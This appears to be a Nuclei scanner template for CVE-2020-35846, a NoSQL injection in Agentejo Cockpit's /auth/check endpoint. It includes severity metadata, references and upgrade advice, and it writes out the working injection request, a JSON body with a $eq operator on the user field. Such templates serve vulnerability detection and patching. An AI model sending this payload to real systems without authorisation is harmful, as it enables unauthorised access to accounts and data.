62 lines
1.9 KiB
YAML
62 lines
1.9 KiB
YAML
id: CVE-2020-35846
|
|
|
|
info:
|
|
name: Agentejo Cockpit < 0.11.2 - NoSQL Injection
|
|
author: dwisiswant0
|
|
severity: critical
|
|
description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or data manipulation.
|
|
remediation: |
|
|
Upgrade Agentejo Cockpit to version 0.11.2 or later to mitigate the vulnerability.
|
|
reference:
|
|
- https://swarm.ptsecurity.com/rce-cockpit-cms/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-35846
|
|
- https://getcockpit.com/
|
|
- https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466
|
|
- https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2020-35846
|
|
cwe-id: CWE-89
|
|
epss-score: 0.78767
|
|
epss-percentile: 0.98182
|
|
cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: agentejo
|
|
product: cockpit
|
|
tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo
|
|
|
|
http:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/auth/check"
|
|
|
|
body: |
|
|
{
|
|
"auth": {
|
|
"user": {
|
|
"$eq": "admin"
|
|
},
|
|
"password": [
|
|
0
|
|
]
|
|
}
|
|
}
|
|
|
|
headers:
|
|
Content-Type: application/json
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "password_verify() expects parameter"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022054a4c1c91d4dc2db65ddab6c58e5ce6ed8009e20d03a321ac03742dfdab22439022100917d48526b787d17f67533ad55a2b0e0d3264e2eb38c019d56255c6a244c707c:922c64590222798bb761d5b6d8e72950 |